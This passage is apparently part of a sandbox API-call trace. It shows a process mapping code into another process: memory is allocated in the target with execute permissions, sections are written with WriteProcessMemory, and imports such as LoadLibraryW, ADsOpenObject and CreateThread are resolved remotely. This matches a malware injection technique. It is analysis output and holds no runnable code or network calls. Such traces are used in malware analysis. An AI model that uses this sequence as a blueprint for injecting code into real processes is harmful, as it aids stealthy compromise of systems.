	[0239.909] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd40000, lpBuffer=0x28b0fe8*, nSize=0x400, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x28b0fe8*, lpNumberOfBytesWritten=0x1286f4*=0x400) returned 1
	[0239.909] VirtualProtectEx (in: hProcess=0x6bc, lpAddress=0x6cd40000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0239.909] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x6cd41000, dwSize=0x8c00, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd41000
	[0239.910] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x8c00) returned 0x286be98
	[0239.910] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd41000, lpBuffer=0x286be98*, nSize=0x8c00, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x286be98*, lpNumberOfBytesWritten=0x1286e0*=0x8c00) returned 1
	[0239.911] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd41000, lpBuffer=0x28b13e8*, nSize=0x8c00, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x28b13e8*, lpNumberOfBytesWritten=0x1286f4*=0x8c00) returned 1
	[0239.912] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x6cd4a000, dwSize=0x1a00, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd4a000
	[0239.912] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x1a00) returned 0x286be98
	[0239.912] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4a000, lpBuffer=0x286be98*, nSize=0x1a00, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x286be98*, lpNumberOfBytesWritten=0x1286e0*=0x1a00) returned 1
	[0239.913] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4a000, lpBuffer=0x28b9fe8*, nSize=0x1a00, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x28b9fe8*, lpNumberOfBytesWritten=0x1286f4*=0x1a00) returned 1
	[0239.913] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x6cd4c000, dwSize=0xc00, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd4c000
	[0239.913] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0xc00) returned 0x286be98
	[0239.913] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4c000, lpBuffer=0x286be98*, nSize=0xc00, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x286be98*, lpNumberOfBytesWritten=0x1286e0*=0xc00) returned 1
	[0239.914] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4c000, lpBuffer=0x28bb9e8*, nSize=0xc00, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x28bb9e8*, lpNumberOfBytesWritten=0x1286f4*=0xc00) returned 1
	[0239.914] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x6cd4d000, dwSize=0xff4, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd4d000
	[0239.914] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x1000) returned 0x286be98
	[0239.914] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4d000, lpBuffer=0x286be98*, nSize=0xff4, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x286be98*, lpNumberOfBytesWritten=0x1286e0*=0xff4) returned 1
	[0239.915] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x6cd4e000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd4e000
	[0239.915] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x200) returned 0x286be98
	[0239.915] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4e000, lpBuffer=0x286be98*, nSize=0x200, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x286be98*, lpNumberOfBytesWritten=0x1286e0*=0x200) returned 1
	[0239.915] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4e000, lpBuffer=0x28bc5e8*, nSize=0x200, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x28bc5e8*, lpNumberOfBytesWritten=0x1286f4*=0x200) returned 1
	[0239.916] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x6cd4f000, dwSize=0xc00, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd4f000
	[0239.916] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0xc00) returned 0x286be98
	[0239.916] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f000, lpBuffer=0x286be98*, nSize=0xc00, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x286be98*, lpNumberOfBytesWritten=0x1286e0*=0xc00) returned 1
	[0239.916] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f000, lpBuffer=0x28bc7e8*, nSize=0xc00, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x28bc7e8*, lpNumberOfBytesWritten=0x1286f4*=0xc00) returned 1
	[0239.917] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x6cd50000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd50000
	[0239.917] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x200) returned 0x286be98
	[0239.917] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd50000, lpBuffer=0x286be98*, nSize=0x200, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x286be98*, lpNumberOfBytesWritten=0x1286e0*=0x200) returned 1
	[0239.917] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd50000, lpBuffer=0x28bd3e8*, nSize=0x200, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x28bd3e8*, lpNumberOfBytesWritten=0x1286f4*=0x200) returned 1
	[0239.918] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x6cd51000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd51000
	[0239.918] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x200) returned 0x286be98
	[0239.918] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd51000, lpBuffer=0x286be98*, nSize=0x200, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x286be98*, lpNumberOfBytesWritten=0x1286e0*=0x200) returned 1
	[0239.918] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd51000, lpBuffer=0x28bd5e8*, nSize=0x200, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x28bd5e8*, lpNumberOfBytesWritten=0x1286f4*=0x200) returned 1
	[0239.918] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x6cd52000, dwSize=0x600, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd52000
	[0239.919] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x600) returned 0x286be98
	[0239.919] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd52000, lpBuffer=0x286be98*, nSize=0x600, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x286be98*, lpNumberOfBytesWritten=0x1286e0*=0x600) returned 1
	[0239.919] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd52000, lpBuffer=0x28bd7e8*, nSize=0x600, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x28bd7e8*, lpNumberOfBytesWritten=0x1286f4*=0x600) returned 1
	[0239.920] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.920] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0239.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd070, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0239.920] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c00a8
	[0239.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd070, cbMultiByte=-1, lpWideCharStr=0x27c00a8, cchWideChar=13 | out: lpWideCharStr="ACTIVEDS.dll") returned 13
	[0239.920] lstrlenW (lpString="ACTIVEDS.dll") returned 12
	[0239.920] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0239.920] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x27c00a8*, nSize=0x1a, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27c00a8*, lpNumberOfBytesWritten=0x12858c*=0x1a) returned 1
	[0239.920] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128510 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128510*=0x70) returned 1
	[0239.920] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0239.921] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0239.921] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0xc, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128508*=0xc) returned 1
	[0239.921] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530*, nSize=0x70, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesWritten=0x128508*=0x70) returned 1
	[0239.921] ResetEvent (hEvent=0x680) returned 1
	[0239.921] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0239.957] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0239.957] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.957] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0239.957] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.957] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c00a8) returned 1
	[0239.957] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.958] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0239.958] lstrlenA (lpString="ADsOpenObject") returned 13
	[0239.958] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0239.958] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcb7e*, nSize=0xe, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcb7e*, lpNumberOfBytesWritten=0x12858c*=0xe) returned 1
	[0239.958] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0239.958] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0239.958] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0239.958] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0239.959] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0239.959] ResetEvent (hEvent=0x680) returned 1
	[0239.959] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0239.960] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0239.960] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.960] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0239.960] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.960] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f224, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0239.960] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.961] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0239.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd0fc, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0239.961] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c00a8
	[0239.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd0fc, cbMultiByte=-1, lpWideCharStr=0x27c00a8, cchWideChar=13 | out: lpWideCharStr="KERNEL32.dll") returned 13
	[0239.961] lstrlenW (lpString="KERNEL32.dll") returned 12
	[0239.961] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0239.961] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x27c00a8*, nSize=0x1a, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27c00a8*, lpNumberOfBytesWritten=0x12858c*=0x1a) returned 1
	[0239.961] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128510 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128510*=0x70) returned 1
	[0239.961] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0239.961] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0239.961] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0xc, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128508*=0xc) returned 1
	[0239.962] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530*, nSize=0x70, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesWritten=0x128508*=0x70) returned 1
	[0239.962] ResetEvent (hEvent=0x680) returned 1
	[0239.962] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0239.963] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0239.963] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.963] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0239.963] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.963] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c00a8) returned 1
	[0239.963] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.963] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0239.963] lstrlenA (lpString="CreateThread") returned 12
	[0239.963] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0239.963] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcb8e*, nSize=0xd, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcb8e*, lpNumberOfBytesWritten=0x12858c*=0xd) returned 1
	[0239.964] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0239.964] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0239.964] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0239.964] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0239.965] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0239.965] ResetEvent (hEvent=0x680) returned 1
	[0239.965] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0239.965] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0239.965] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.966] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0239.966] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.966] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f22c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0239.966] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.966] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0239.966] lstrlenA (lpString="DeleteCriticalSection") returned 21
	[0239.966] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0239.967] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcb9e*, nSize=0x16, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcb9e*, lpNumberOfBytesWritten=0x12858c*=0x16) returned 1
	[0239.967] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0239.967] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0239.967] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0239.967] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0239.968] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0239.968] ResetEvent (hEvent=0x680) returned 1
	[0239.968] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0239.968] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0239.968] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.968] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0239.968] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.968] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f230, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0239.969] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.969] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0239.969] lstrlenA (lpString="EnterCriticalSection") returned 20
	[0239.969] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0239.969] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcbb6*, nSize=0x15, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcbb6*, lpNumberOfBytesWritten=0x12858c*=0x15) returned 1
	[0239.970] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0239.970] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0239.970] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0239.970] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0239.970] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0239.971] ResetEvent (hEvent=0x680) returned 1
	[0239.971] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0239.971] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0239.971] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.971] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0239.971] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.971] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f234, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0239.972] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.972] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0239.972] lstrlenA (lpString="GetCurrentProcess") returned 17
	[0239.972] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0239.972] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcbce*, nSize=0x12, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcbce*, lpNumberOfBytesWritten=0x12858c*=0x12) returned 1
	[0239.972] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0239.972] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0239.972] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0239.972] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0239.973] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0239.973] ResetEvent (hEvent=0x680) returned 1
	[0239.973] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0239.973] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0239.974] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.974] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0239.974] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.974] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f238, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0239.974] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.974] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0239.974] lstrlenA (lpString="GetCurrentProcessId") returned 19
	[0239.974] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0239.975] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcbe2*, nSize=0x14, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcbe2*, lpNumberOfBytesWritten=0x12858c*=0x14) returned 1
	[0239.975] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0239.975] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
